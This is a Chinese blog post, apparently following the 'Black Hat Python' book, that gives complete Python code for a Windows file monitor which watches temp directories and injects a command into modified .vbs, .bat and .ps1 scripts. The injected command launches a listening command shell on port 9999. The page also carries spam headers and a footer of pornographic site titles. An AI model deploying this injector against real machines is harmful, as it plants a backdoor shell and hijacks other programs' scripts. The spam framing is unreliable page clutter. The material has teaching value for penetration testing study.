欧美三区_成人在线免费观看视频_欧美极品少妇xxxxⅹ免费视频_a级毛片免费播放_鲁一鲁中文字幕久久_亚洲一级特黄

Python黑帽子:黑客與滲透測試編程之道 windows系統提取篇3 在文件

系統 1862 0

代碼思路:

首先定義三個文件類型。.vbs,.bat,.ps1。對這三個后綴名的文件進行監視,并根據后綴名不同,插入不同的代碼。(意思都是運行那個command)。

windows是創建一個文件并寫入數據的過程,其實就是先create,再modify,所以當檢測到有后綴名為windows下可以執行的文件被修改時。就可以插入惡意代碼。這里簡單的用一個inject_code()函數來表示插入的過程。

同時為了區分一個臨時文件是否已經被插入了惡意代碼,可以使用一個標志位加以區分。

代碼:

            import win32file
import tempfile
import threading
import os
import win32con

dir_minitor=["C:\\Windows\\Temp",tempfile.gettempdir()]
FILE_CREATED =1
FILE_DELETED =2
FILE_MODIFIED = 3
FILE_RENAMED_FROM=4
FILE_RENAMED_TO = 5

file_type={}
command="C:\\WINDOWS\\TEMP\\bhpnet.exe -l -p 9999 -c"
file_type['.vbs']=['\r\nbhpmarker\r\n','\r\nCreateObject(\"Wscript.Shell\").Run(\"%s\")\r\n'%command]
file_type['.bat']=['\r\nbhpmarker\r\n','\r\n%s\r\n'%command]
file_type['.ps1']=['\r\nbhpmarker\r\n','Start-Process\"%s\"\r\n'%command]

#print file_type.keys()
def code_inject(full_filename,extension,contents):
    #print "run"
    if file_type[extension][0] in contents:
        #print "hahha"
        return
    full_content=file_type[extension][0]
    full_content+=file_type[extension][1]
    full_content+=contents

    fd=open(full_filename,"wb")
    fd.write(full_content)
    fd.close()

    print "Injected code"
    return

def startMimitor(dir):
    FILE_LIST_DIRECTORY=0x0001
    dir_director=win32file.CreateFile(
        dir,
        FILE_LIST_DIRECTORY,
        win32con.FILE_SHARE_READ|win32con.FILE_SHARE_WRITE|win32con.FILE_SHARE_DELETE,
        None,
        win32con.OPEN_EXISTING,
        win32con.FILE_FLAG_BACKUP_SEMANTICS,
        None
    )
    while 1:
        try:
            results=win32file.ReadDirectoryChangesW(
                dir_director,
                1024,
                True,
                win32con.FILE_NOTIFY_CHANGE_DIR_NAME|win32con.FILE_NOTIFY_CHANGE_FILE_NAME|win32con.FILE_NOTIFY_CHANGE_ATTRIBUTES|win32con.FILE_NOTIFY_CHANGE_SIZE|win32con.FILE_NOTIFY_CHANGE_LAST_WRITE|win32con.FILE_NOTIFY_CHANGE_SECURITY,
                None,
                None
            )
            for action,file_name in results:
                full_filename=os.path.join(dir,file_name)
                #print full_filename
                filename,extension = os.path.splitext(full_filename)
                # print filename
                # print extension
                if extension in file_type:
                    flag=1
                if action==FILE_CREATED:
                    if flag:
                        print "[*] Created %s"%full_filename
                elif action==FILE_DELETED:
                    if flag:
                        print "[-] Deleted %s"%full_filename
                elif action==FILE_MODIFIED:
                    if flag:
                        print "[*] Modified %s"%full_filename

                        print "[vvv] Dumping contents ...."
                        try:
                            fd = open(full_filename,"rb")
                            contents=fd.read()
                            fd.close()
                            print contents
                            print "[^^^] Dump complete."
                        except:
                            print "[!!!] Failed"
                        filename,extension=os.path.splitext(full_filename)
                        print full_filename+extension+contents
                        code_inject(full_filename,extension,contents)
                elif action==FILE_RENAMED_FROM:
                    if flag:
                        print "[>] Renamed from :%s"%full_filename
                elif action==FILE_RENAMED_TO:
                    if flag:
                        print "[<] Renamed to %s"%full_filename
                else:
                    if flag:
                        print "[???] Unknown:%s"%full_filename
        except:
            pass


for path in dir_minitor:
    monitor_thread = threading.Thread(target=startMimitor,args=(path,))
    print "Spawning monitoring thread for path:%s"%path
    # print file_type
    # if '.bat' in file_type.keys():
    #     print file_type
    monitor_thread.start()
          

運行結果:

Python黑帽子:黑客與滲透測試編程之道 windows系統提取篇3 在文件監視器中插入代碼_第1張圖片

?

?


更多文章、技術交流、商務合作、聯系博主

微信掃碼或搜索:z360901061

微信掃一掃加我為好友

QQ號聯系: 360901061

您的支持是博主寫作最大的動力,如果您喜歡我的文章,感覺我的文章對您有幫助,請用微信掃描下面二維碼支持博主2元、5元、10元、20元等您想捐的金額吧,狠狠點擊下面給點支持吧,站長非常感激您!手機微信長按不能支付解決辦法:請將微信支付二維碼保存到相冊,切換到微信,然后點擊微信右上角掃一掃功能,選擇支付二維碼完成支付。

【本文對您有幫助就好】

您的支持是博主寫作最大的動力,如果您喜歡我的文章,感覺我的文章對您有幫助,請用微信掃描上面二維碼支持博主2元、5元、10元、自定義金額等您想捐的金額吧,站長會非常 感謝您的哦?。?!

發表我的評論
最新評論 總共0條評論
主站蜘蛛池模板: 久久久婷 | 久草 在线 | 国产一区在线免费观看 | 成人颜色视频 | 午夜寂寞在线观看 | 男女真实有遮挡xx00动态图 | 国产亚洲精品久久精品录音 | 精品国产福利久久久 | 男女激情爱爱 | 99国精产品一区二区三区A片 | 午夜在线视频一区二区三区 | 精品欧美成人高清视频在线观看 | 欧美日韩高清不卡一区二区三区 | 国产免国产免费 | 成人午夜大片免费视频77777 | 国产乱码精品一区二区三区中 | 欧美交换乱理伦片120秒 | 久久精品国产精品青草图片 | 一级片免费在线播放 | 国产视频福利 | 亚洲国产欧美91 | 天天操国产 | 第四色婷婷墓地 | 久草在线视频在线 | 青青青国产依人精品视频 | 色网在线免费观看 | 狠狠操电影 | 偶像练习生在线免费观看 | 综合二区| 日韩欧美中文在线 | 777色狠狠一区二区三区香蕉 | 国产精品免费久久久免费 | 午夜在线观看免费视频 | 羞羞视频网站在线观看 | 国产精品福利短视在线播放频 | 亚洲六月丁香色婷婷综合久久 | 精品乱子伦一区二区三区 | 久久一本久综合久久爱 | 国产一区二区在线免费观看 | 天天爽天天色 | 成人午夜网 |